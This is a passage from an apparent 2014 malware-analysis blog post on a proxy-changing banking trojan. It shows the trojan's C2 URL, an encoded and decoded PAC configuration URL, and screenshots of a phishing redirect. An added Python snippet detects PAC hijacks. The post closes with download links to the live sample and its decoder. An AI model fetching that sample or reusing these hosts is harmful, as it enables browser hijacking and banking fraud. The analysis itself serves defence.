<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">else</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Exit;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The Delphi decoder is available for download further down.</span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #333333;"><span style="line-height: 20px;">The trojan connects to the following server, which replies with an encoded string: the proxy configuration (a PAC URL) that will be set in the browser.</span></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;">0012FDE8 |00BCB5BC UNICODE "http://www.agoracadastre.com.br/proxy/RRU8PAYVBF2U412715V3/"</span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;">0012FDEC |00BCB4FC UNICODE "?MD5=be84e40f0fb2cd36ce74bd9c0d1df90d"</span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
</div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><b>String returned by the server</b></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;">"Q7HqS3elBp4vCYunEJWkE3akCJauBr9ILJXGGLbMGaOoLJGnCZSnDLOpBd1XOm"</span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Decoded:</b></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"> |00BCB67C UNICODE "http://192.198.89.198/RRU8PAYVBF2U412715V3.pac"</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvl4-oGy6lsso01xvS68hL1fmmFdE9XHGUwMKoqEV2wddbQSn6KBb2X2eFGZdFmjDV_HpiB1V0m1jRA488thsIr3uR03Hi631crukmq2HHv4yiENarWVp5JgWo2IU3OvqNiEiWshY5Q0Q/s1600/trafic.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvl4-oGy6lsso01xvS68hL1fmmFdE9XHGUwMKoqEV2wddbQSn6KBb2X2eFGZdFmjDV_HpiB1V0m1jRA488thsIr3uR03Hi631crukmq2HHv4yiENarWVp5JgWo2IU3OvqNiEiWshY5Q0Q/s1600/trafic.jpg" height="420" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7S3yeKGTRO41MswUV3MY1bWyDiqUHrpd7mJEsZGIdbRPBuHrhHJ2VpLDh9U7cDwZcrb0zEuaemLQDerO-dxRq5W3RrtaWY-iin6FfJMZf2Rm91dXYmmTPUN1UF5i9aDatYC9Ue_WsbA4/s1600/trafic2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7S3yeKGTRO41MswUV3MY1bWyDiqUHrpd7mJEsZGIdbRPBuHrhHJ2VpLDh9U7cDwZcrb0zEuaemLQDerO-dxRq5W3RrtaWY-iin6FfJMZf2Rm91dXYmmTPUN1UF5i9aDatYC9Ue_WsbA4/s1600/trafic2.jpg" height="352" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Browser network configuration (set to use an automatic configuration script).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACDu9dgMJGD1lAcjEewJVSbLp_wMBmFmsp6o3vvIeRtkAqAsKDpNCo1vWemo6tJ3kNiC-6Sw0pfTzHgXS_zOIOZ9PpE_7ldM_8gRxVP53ImL9dIAKDZMA_YVvRNm3prP7n7V6sYDPOBE/s1600/proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACDu9dgMJGD1lAcjEewJVSbLp_wMBmFmsp6o3vvIeRtkAqAsKDpNCo1vWemo6tJ3kNiC-6Sw0pfTzHgXS_zOIOZ9PpE_7ldM_8gRxVP53ImL9dIAKDZMA_YVvRNm3prP7n7V6sYDPOBE/s1600/proxy.png" height="400" width="296" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Browser redirected to a phishing site.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2_7QQDOORiZisGLc1XYrKKouLwl5UQkhi4-WhyphenhyphenOxvbKVJHDZOHiW6kpE5uv5pAL0hIRnUQ4XgikSTWIzlWbffOdiypUiLlt9xcCIyk6EhBqj4Ds4vYPysJt6OQo3CFcJLf8URtULjWkw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2_7QQDOORiZisGLc1XYrKKouLwl5UQkhi4-WhyphenhyphenOxvbKVJHDZOHiW6kpE5uv5pAL0hIRnUQ4XgikSTWIzlWbffOdiypUiLlt9xcCIyk6EhBqj4Ds4vYPysJt6OQo3CFcJLf8URtULjWkw/s1600/12.png" /></a></div>
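<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (not code from the original post or from the sample's decoder): a defender-side check of what a PAC-based proxy hijack like this one leaves behind. <code>pac_url_indicators</code> flags an AutoConfigURL shaped like the decoded one above (cleartext http, IP-literal host, long random .pac name); <code>pac_routes</code> parses a PAC body to list which host patterns are sent through a proxy while everything else goes DIRECT, which is what lets the phishing redirect stay selective and unnoticed. The PAC text, hostnames and proxy address are constructed placeholders.</span></div>

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample PAC, modelled on the hijack described in the post.
# It is NOT the file the malware served; hostnames and proxy are placeholders.
SAMPLE_PAC = """
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.bank-one.example") ||
        dnsDomainIs(host, "homebanking.example"))
        return "PROXY 192.0.2.10:8080";
    return "DIRECT";
}
"""

# The two PAC helpers most often used to single out victim hosts.
HOST_TEST = re.compile(r'(?:shExpMatch|dnsDomainIs)\s*\(\s*host\s*,\s*"([^"]+)"\s*\)')
# An if-condition followed directly by the proxy string it returns.
IF_RETURN = re.compile(r'if\s*\((.*?)\)\s*return\s*"([^"]*)"', re.S)


def pac_url_indicators(pac_url):
    """Heuristics on an AutoConfigURL value: cleartext scheme, bare IP host,
    and a long random-looking .pac filename (as in the decoded URL above)."""
    u = urlparse(pac_url)
    flags = []
    if u.scheme == "http":
        flags.append("cleartext_http")
    try:
        ip_address(u.hostname or "")  # raises ValueError for a DNS name
        flags.append("ip_literal_host")
    except ValueError:
        pass
    if re.search(r"/[A-Z0-9]{12,}\.pac$", u.path):
        flags.append("random_looking_filename")
    return flags


def pac_routes(pac_text):
    """Map each host pattern tested in the PAC to the proxy it is sent to."""
    routes = {}
    for cond, target in IF_RETURN.findall(pac_text):
        for pattern in HOST_TEST.findall(cond):
            routes[pattern] = target
    return routes


def hijacked_hosts(pac_text):
    """Host patterns that leave the machine via a proxy instead of DIRECT."""
    return [h for h, t in pac_routes(pac_text).items() if t.upper() != "DIRECT"]
```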
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Sample: https://www.dropbox.com/s/jx26orkjvyoxqop/ProxyChanger%2009-05-14.rar</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Decoder: https://www.dropbox.com/s/kthppdb512lsf2s/DelphiDecript.rar</span></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
</div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>